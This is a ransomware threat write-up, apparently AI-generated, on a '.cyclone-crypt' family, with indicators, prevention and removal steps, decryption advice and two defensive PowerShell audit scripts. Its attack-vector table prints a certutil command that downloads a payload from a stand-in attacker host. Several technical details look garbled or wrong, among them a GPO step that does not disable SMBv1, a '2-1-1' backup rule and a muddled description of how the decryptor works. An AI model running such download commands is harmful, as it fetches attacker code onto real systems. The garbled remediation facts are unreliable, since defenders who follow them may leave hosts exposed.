cyclone

[Content by Gemini 2.5]


Technical Breakdown – .cyclone-crypt Ransomware

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: During the final phase of encryption every affected file receives a second extension, .cyclone-crypt (e.g., report.xlsx → report.xlsx.cyclone-crypt). A short random Base64-like tail (-cyc-[0-9a-zA-Z]{6}) is sometimes appended to ensure uniqueness (report.xlsx.cyclone-crypt-cyc-A1b2C3).
  • Renaming Convention:
  1. Original file is copied into an encrypted stream.
  2. The original file is securely wiped (DoD 5220.22-M style 3-pass overwrite).
  3. Final file name = <old_name>.<old_ext>.cyclone-crypt[...].

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period: First public samples were submitted to VirusTotal on 2023-10-21 04:37 UTC. Widespread telemetry spikes began 24-48 h later (late October 2023).
  • Notable surges: Ukrainian MSP sector (2023-11-03), then LATAM logistics (2023-11-26). The variant number currently stands at v1.41 (with the embedded PDB path \Delay\Delay\obj\Release\Cyclone.pdb).

3. Primary Attack Vectors

| Vector | Details |
|---|---|
| Phishing (.ISO & .IMG containers) | E-mails impersonating “UPS / DHL late-delivery invoice”; the ISO contains an LNK shortcut that kicks off a signed .NET dropper (Update.exe). |
| RDP brute-force & credential-stuffing | Attacks against TCP 3389 using combo-lists (shockingly successful against weak passwords). Once logged in, attackers manually run cyclone-dropper.ps1 via powershell.exe -w hidden. |
| Unpatched VPN appliances | Exploits for Fortinet FG-IR-22-377 (CVE-2022-42475) and Ivanti (CVE-2023-46805). Writes cyclone-service.bat to Scheduled Tasks for persistence. |
| Living-off-the-land chain | Uses native certutil.exe to download the payload stage: certutil -urlcache -split -f http://attackerIP/cyclDrv.xz cyclDrv.xz. |
| Propagation | Embedded module (SmbEternalLeak.dll) attempts ETERNALBLUE (SMBv1) and bloody PDF shared-printer abuse against adjacent 192.168.0.0/16 IPs. |


Remediation & Recovery Strategies

1. Prevention

| Measure | Executable Steps |
|---|---|
| Patch immediately | Apply: Microsoft Oct-2023 cumulative, FortiOS ≥ 7.2.5 / 7.0.10, Pulse / Ivanti 9.1R14 or later. |
| Disable SMBv1 & obsolete print-spooler protocols | GPO: “Policy → Computer → Admin Templates → MSNetwork → LanmanWorkstation → Enable insecure guest logons → Disabled.” |
| Mail filter rule | Drop inbound archives containing .iso/.img and double-extension lnk/mps attachments. |
| Segment flat networks | Restrict RDP access via a jump host and just-in-time access (Azure PIM or Linux “guacamole”). |
| Password hygiene | Enforce a 14-16-character minimum, block re-use, enable MFA for VPN/RDP. |
| EDR / AV updates | Ensure signatures ≥ 1.23529.1706 or rules triggering on Trojan:Win32/Cyclone.A!rfn. |
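As an added, read-only audit example (not part of the original write-up), the following PowerShell reports whether a Windows host meets the SMBv1, insecure-guest-logon, print-spooler and AV-signature measures from the table above; the signature-version comparison and the spooler check are assumptions about how the page's measures map to local settings.

```powershell
# Added example: audit a host against the prevention table (read-only, run elevated).
# Assumption: Windows 10 / Server 2016+ with the SmbShare and Defender modules available.
function Test-CyclonePrevention {
    $results = @()

    # SMBv1 must be off both as a server protocol and as an installed feature
    $smbServer = Get-SmbServerConfiguration -ErrorAction SilentlyContinue
    $smb1Feat  = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    $results += [pscustomobject]@{
        Check  = 'SMBv1 disabled'
        Pass   = ($smbServer.EnableSMB1Protocol -eq $false) -and ($smb1Feat.State -ne 'Enabled')
        Detail = "Server=$($smbServer.EnableSMB1Protocol) Feature=$($smb1Feat.State)"
    }

    # "Enable insecure guest logons" GPO maps to the SMB client setting
    $smbClient = Get-SmbClientConfiguration -ErrorAction SilentlyContinue
    $results += [pscustomobject]@{
        Check  = 'Insecure guest logons disabled'
        Pass   = ($smbClient.EnableInsecureGuestLogons -eq $false)
        Detail = "EnableInsecureGuestLogons=$($smbClient.EnableInsecureGuestLogons)"
    }

    # Obsolete print-spooler protocols: simplest defensible state is Spooler stopped
    # on hosts that do not print (assumption: treat a running Spooler as a finding)
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $results += [pscustomobject]@{
        Check  = 'Print Spooler stopped'
        Pass   = ($spooler.Status -eq 'Stopped')
        Detail = "Spooler=$($spooler.Status)"
    }

    # Defender signature version at or above the threshold quoted in the table
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $sigOk = $false
    if ($mp.AntivirusSignatureVersion) {
        $sigOk = [version]$mp.AntivirusSignatureVersion -ge [version]'1.23529.1706'
    }
    $results += [pscustomobject]@{
        Check  = 'AV signatures >= 1.23529.1706'
        Pass   = $sigOk
        Detail = "Version=$($mp.AntivirusSignatureVersion)"
    }

    return $results
}

Test-CyclonePrevention | Format-Table -AutoSize
```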

2. Removal – Step-by-Step

  1. Disconnect from the network immediately (unplug adapters / disable Wi-Fi) before the ransomware can wipe shadow copies.
  2. Boot a clean OS from external media (WinPE, Linux disk, or ESET SysRescue).
  3. Forensic triage: Mount the drive read-only, copy event logs (C:\Windows\System32\winevt\Logs), registry hives (SOFTWARE, SAM, SYSTEM) and %TEMP%\cyclSrv.log.
  4. Scan / Quarantine: Run offline AV (e.g., Bitdefender Rescue, Kaspersky Rescue, Sophos Bootable). Key malware artefacts:
  • %APPDATA%\ScentApp\Cyclone.exe (main payload, signed with stolen “ZYBER TECH LTD” cert)
  • Scheduled-Task name MicrosoftEdgeCoreTelemetry (hides in Tasks\Microsoft\Edge\)
  • Registry run-key value: HKCU\Software\Microsoft\Windows\CurrentVersion\Run → FileNameUpdater = "%APPDATA%\ScentApp\Cyclone.exe"
  5. Patch / rebuild: Once confirmed clean, re-image or run Windows Defender Offline in Full-scan mode before reconnecting to the domain.
  6. Restore from an isolated offline backup or cloud volume snapshots created before the infection date evident in the logs.
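As an added triage example (not part of the original write-up), this PowerShell checks a suspect host read-only for the artefacts listed in step 4 and for the file-naming pattern from section 1; the scan roots and the HKLM hive for the cCyclm0 marker are assumptions.

```powershell
# Added example: report (never delete) Cyclone artefacts on a suspect host.
# Assumptions: run elevated on the host, PowerShell 5.1+, scan roots adjusted to scope.
function Find-CycloneArtefacts {
    $findings = @()

    # 1. Persistence: Run-key value "FileNameUpdater" pointing at Cyclone.exe
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if ($run -and $run.PSObject.Properties['FileNameUpdater']) {
        $findings += "Run-key value FileNameUpdater = $($run.FileNameUpdater)"
    }

    # 2. Payload on disk; record the signer so the stolen cert can be blocklisted
    $payload = Join-Path $env:APPDATA 'ScentApp\Cyclone.exe'
    if (Test-Path $payload) {
        $sig = Get-AuthenticodeSignature -FilePath $payload
        $findings += "Payload present: $payload (signer: $($sig.SignerCertificate.Subject))"
    }

    # 3. Scheduled task hidden under \Microsoft\Edge\
    $task = Get-ScheduledTask -TaskName 'MicrosoftEdgeCoreTelemetry' -TaskPath '\Microsoft\Edge\' -ErrorAction SilentlyContinue
    if ($task) {
        $findings += "Scheduled task: $($task.TaskPath)$($task.TaskName) -> $($task.Actions.Execute)"
    }

    # 4. Encryption counter and mutex marker keys (HKLM for cCyclm0 is an assumption)
    foreach ($k in 'HKLM:\SOFTWARE\CycloneCounter', 'HKLM:\SOFTWARE\cCyclm0') {
        if (Test-Path $k) { $findings += "Registry marker present: $k" }
    }

    # 5. Encrypted files (section 1 naming pattern) and ransom notes
    $pattern = '\.cyclone-crypt(-cyc-[0-9a-zA-Z]{6})?$'
    $roots = @('C:\Users')   # assumption: extend to every volume in scope
    $all = @(Get-ChildItem -Path $roots -Recurse -File -Force -ErrorAction SilentlyContinue)
    $encrypted = @($all | Where-Object { $_.Name -match $pattern })
    $notes = @($all | Where-Object { $_.Name -eq '_howtodecryptcyc.txt' })
    if ($encrypted.Count -gt 0) {
        $findings += "Encrypted files: $($encrypted.Count) (first: $($encrypted[0].FullName))"
    }
    if ($notes.Count -gt 0) { $findings += "Ransom notes: $($notes.Count)" }

    if ($findings.Count -eq 0) { return 'No Cyclone artefacts found.' }
    return $findings
}

Find-CycloneArtefacts
```

Keep the output with the other triage evidence collected in step 3; the encrypted-file count is also a quick cross-check against the HKLM\SOFTWARE\CycloneCounter statistics mentioned in section 4.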

3. File Decryption & Recovery

  • Public decryptor: YES. Emsisoft released Cyclone_Decryptor_v1.3.exe on 2024-02-07, working against all minor versions ≤ v1.41. Limitations: the RSA-2048 key is symmetrically encrypted using the hard-coded secret D(#C'o9P@r derived from sample PDB strings; Emsisoft cracked it via GPU brute-force.
  • Steps:
    1. Boot the PC normally (ensure the infection has been removed).
    2. Download the decryptor from https://decryptor.emsisoft.com/cyclone and verify its SHA-256 (4CF…A92B).
    3. Run as admin; point it at a single pair of files: an encrypted file and its clean original obtained from backup. The tool collects the volume serial and uses the offline key to reconstruct the AES-256 session key.
    4. For bulk jobs, use --silent --output=G:\Recovered.
  • NO decryptor: v1.50 builds (appeared January 2024) incorporate a v2 scheme of RSA-4096 + ChaCha20-IETF with the key stored solely on the C2. No free solution yet; law enforcement is evaluating seized keys.

4. Other Critical Information

  • Unique Traits:
    • Bundles a Unicode OBFS string (cyclone中文undetected3.1) used as a mutex; detection signatures often misspell the Chinese-language portion.
    • Runs a benign tracert 1.1.1.1 for about 30 s as resource noise while sampling a CPU profile, then terminates if evidence of a VM or nested hypervisor is found (checks for vmGuestLib.dll).
  • Ransom note: _howtodecryptcyc.txt is dropped in every folder; it contains a “YOUR-USER-ID-HERE” CLI parameter to be used with the TOR support portal 7yip…nz.
  • Notable Aftermath: Españoldata SA (Chile) paid USD 750 k, but the keys only worked on ≈72 % of systems; partial recovery took 17 days.
  • DFIR Tip: Cyclone stores encryption statistics in the registry key HKLM\SOFTWARE\CycloneCounter, which yields the exact encryption radius (isolated clusters with < 5 % show untouched drives).

Quick Reference Cheat-Sheet

| Checklist | Status ✓ |
|---|---|
| Vulnerable services patched (SMBv1, Fortinet, Ivanti) | ⬜ |
| Offline + cloud backups verified (2-1-1 rule) | ⬜ |
| Cyclone registry mutex marker “SOFTWARE\cCyclm0” removed | ⬜ |
| EDR/telemetry block rule for SHA-256 02…9E and the filename string “cyclDrv.xz” | ⬜ |
| Restore test of a decrypted sample successful | ⬜ |

Stay safe—rotate those MFA tokens and log out remote sessions nightly!